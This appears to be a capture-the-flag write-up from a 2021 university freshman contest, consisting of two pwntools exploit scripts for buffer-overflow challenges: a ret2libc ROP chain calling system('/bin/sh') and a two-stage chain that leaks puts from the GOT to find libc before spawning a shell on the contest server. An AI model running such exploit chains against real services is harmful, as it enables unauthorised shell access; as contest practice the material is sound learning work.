南邮2021新生赛PWN部分
直接上exp了
Ret2Libc
from pwn import*
# Connect to the challenge service; the commented-out process() line below is
# the local-binary alternative.
p = remote('121.4.15.155',10001)
#p = process('./ny_ret2libc')
# All addresses are fixed 0x40xxxx values, which only hold for a non-PIE build
# (TODO confirm with checksec); under PIE/ASLR these constants would be invalid.
pop_rdi_addr=0x401223   # assumed to be a `pop rdi; ret` gadget, per its name
pop_rsi_addr=0x401221   # defined but never used below
bin_sh_addr=0x404040    # presumably a "/bin/sh" string in a data section -- verify
system_addr=0x401040    # presumably system's PLT stub -- verify
# 88 bytes of filler followed by the gadget address (presumably landing on the
# saved return address), then the argument popped into rdi, then system.
# Defender's view: a stack canary would be clobbered by the filler and abort
# before the return, and PIE/ASLR would invalidate every constant above; the
# root cause is the unbounded read that lets 88+ bytes past the buffer.
payload2=b"B"*88+p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(system_addr)
p.sendline(payload2)
p.interactive()
Ret2Libc pro max
from LibcSearcher import *
from pwn import *
#context(os="linux", arch="amd64")
#context.log_level="debug"
# Target switch: 0 selects the remote service, any non-zero value the local binary.
local = 0
elf = ELF('./ny_ret2libc2')
ret_addr = 0x40101a   # defined but never used below
pop_rdi = 0x401223    # assumed to be a `pop rdi; ret` gadget, per its name
if local:
    pro = process('./ny_ret2libc2')
else:
    pro = remote('121.4.15.155', 10004)
def get_libcbase():
    """Leak the runtime address of puts and derive the libc base from it.

    Sends a chain that calls puts(puts@got) and then returns into main, reads
    the leaked pointer, and subtracts the puts offset reported by LibcSearcher.
    Reads the module-level `elf`, `pro` and `pop_rdi`.

    Returns:
        (libc, libc_addr): the LibcSearcher object and the computed libc base.
    """
    puts_plt=elf.plt['puts']
    puts_got=elf.got['puts']
    main_addr = elf.sym['main']
    # 0x50+8 bytes of filler, then pop rdi <- puts@got, call puts@plt, and
    # return into main so the program can be driven a second time.
    # Defender's view: the GOT entry is readable even under full RELRO, so what
    # makes ASLR bypassable here is the overflow granting an info-leak, not the GOT.
    payload=b'a'*(0x50+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
    pro.sendlineafter('funny\n',payload)
    # The leaked pointer is read as 6 raw bytes and zero-padded to 8 for u64.
    puts_addr= u64(pro.recv(6).ljust(8,b'\x00'))
    # puts_addr = u64(pro.recv(8))
    libc = LibcSearcher('puts',puts_addr)
    # libc.dump('puts') is presumably the symbol's offset within libc -- verify.
    libc_addr = puts_addr - libc.dump('puts')
    print('________________',hex(libc_addr))
    return libc,libc_addr
def get_shell(libc,libc_addr):
    """Second stage: call system with a "/bin/sh" pointer using the leaked base.

    Args:
        libc: LibcSearcher object returned by get_libcbase().
        libc_addr: libc base address computed from the leak.

    Reads the module-level `pro` and `pop_rdi`; ends in an interactive session.
    """
    binsh=libc_addr+libc.dump('str_bin_sh')
    system=libc_addr+libc.dump('system')
    # Same filler length as the leak stage; the first chain returned into main,
    # so the same overflow is presumably reachable again here.
    payload=b'a'*(0x50+8)+p64(pop_rdi)+p64(binsh)+p64(system)
    pro.sendlineafter('funny\n',payload)
    pro.interactive()
if __name__ == '__main__' :
    # Stage 1 leaks and computes the libc base; stage 2 reuses both values.
    libc ,libc_addr = get_libcbase()
    get_shell(libc,libc_addr)